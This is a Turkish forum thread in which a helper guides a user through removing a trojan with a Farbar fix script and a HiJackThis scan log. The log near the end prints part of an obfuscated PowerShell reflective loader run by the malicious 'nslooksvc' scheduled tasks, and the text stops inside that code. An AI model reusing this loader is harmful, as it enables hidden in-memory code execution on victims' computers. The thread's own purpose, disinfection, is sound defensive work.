Trojan Win32 Sepeh Gen nasıl temizlenebilir?

Sırasıyla,

Denetim masasından; Kaspersky, McAfee, Trojan Remover, Links ve diğer bilmediğim tüm uygulamaları kaldır.

Aşağıdaki araçları sırayla çalıştırıp kalıntıları temizle.


Kodu kopyaladıktan sonra Farbar'dan Fix tuşuna bas. Fixlog.txt adındaki dosyayı burada paylaş.

Kod: 
start::
emptytemp:
virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
BootExecute:
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File)
Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software)
Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters).
Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129
FF HKLM\...\Firefox\Extensions: [light_plugin_7571494CE0B94E11BB762B659A4AD71F@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [light_plugin_7571494CE0B94E11BB762B659A4AD71F@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION
CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16]
CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC)
2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz
2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon
2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater
2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack
2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee
2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software
AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23}
FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58}
Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden
Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION
ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
end::
 
acv dedi:
Sırasıyla,

Denetim Masası'ndan; Kaspersky, McAfee, trojan remover, links ve diğer bilmediğim tüm uygulamaları kaldır.

Aşağıdaki araçları sırayla çalıştırıp kalıntıları temizle.


Kodu kopyaladıktan sonra Farbar'dan fix tuşuna bas. Fixlog.txt adındaki dosyayı burada paylaş.

Kod: 
start::
emptytemp:
virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION.
BootExecute:
GroupPolicy: Restriction ? <==== ATTENTION.
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION.
Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File)
Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software)
Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters).
Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129
FF HKLM\...\Firefox\Extensions: [light_plugin_7571494CE0B94E11BB762B659A4AD71F@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found.
FF HKLM-x32\...\Firefox\Extensions: [light_plugin_7571494CE0B94E11BB762B659A4AD71F@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found.
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION.
CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16]
CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC)
2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz
2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon
2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater
2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack
2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software.
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software.
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover.
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee
2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software.
AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23}
FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58}
Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden.
Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION.
ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File.
FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File.
FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File.
FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File.
FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File.
FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File.
end::
Genişletmek için tıkla...

www.mediafire.com

Fixlog

MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com

Hocam fixlog notu yukarıda fakat farbar recovery otomatik olarak D diskime inmiş Windows C diskimde kurulu sorun olur mu?
@acv hocam neredesiniz.
 
Son düzenleme:
Olmaz. Chrome'dan Fishing.io ve Safe Torrent Scanner adlı eklentileri kaldırın. Aşağıdaki raporu paylaşın sonrasında.

Rehber: HijackThis Log Paylaşımı ve Çözümleri

Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
www.technopat.net www.technopat.net
 
acv dedi:
Olmaz. Chrome'dan Fishing.io ve Safe Torrent Scanner adlı eklentileri kaldırın. Aşağıdaki raporu paylaşın sonrasında.

Rehber: HijackThis Log Paylaşımı ve Çözümleri

Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
www.technopat.net www.technopat.net
Genişletmek için tıkla...

[CODE title="HiJackThis"]Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16

Platform: x64 Windows 10 (Pro), 10.0.19043.1526 (ReleaseId: 2009, 21H1), Service Pack: 0
Time: 06.03.2022 - 21:58 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: Yılmaz (group: Administrators) on DESKTOP-DU3LFJF, FirstRun: yes

Chrome: 96.0.4664.110
Firefox: 97.0.2.8098
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
1 C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
1 C:\Program Files\AMD\CNext\CNext\cncmd.exe
1 C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe
1 C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
1 C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
1 C:\Program Files\Riot Vanguard\vgc.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MpCopyAccelerator.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\NisSrv.exe
6 C:\Users\muhan\AppData\Local\Discord\app-1.0.9004\Discord.exe
7 C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe
1 C:\Users\muhan\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\System32\amdfendrsr.exe
1 C:\Windows\System32\audiodg.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atieclxx.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
4 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
70 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SysWOW64\dllhost.exe

O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_51\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_51\bin\ssv.dll
O4 - HKCU\..\Run: [com.blitz.app] = C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe --autostart
O4 - HKCU\..\Run: [Discord] = C:\Users\muhan\AppData\Local\Discord\Update.exe --processStart Discord.exe
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/05/13)
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [RtkAudUService] = C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe -background
O17 - DHCP DNS 1: 192.168.1.1
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\Windows\explorer.exe
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1001 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\Windows\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\Windows\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\Windows\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\Windows\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (disabled) googleupdatetaskmachinecore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: (disabled) googleupdatetaskmachineua - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Microsoft\Windows\Defrag\ScheduledDefrag - C:\Windows\system32\defrag.exe \\?\Volume{d1427864-26fc-4798-9271-6340f51fe19e}\ (Microsoft)
O22 - Task: \Mozilla\Firefox Background Update 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP
O22 - Task: AMDLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate
O22 - Task: AMDRyzenMasterSDKTask - C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 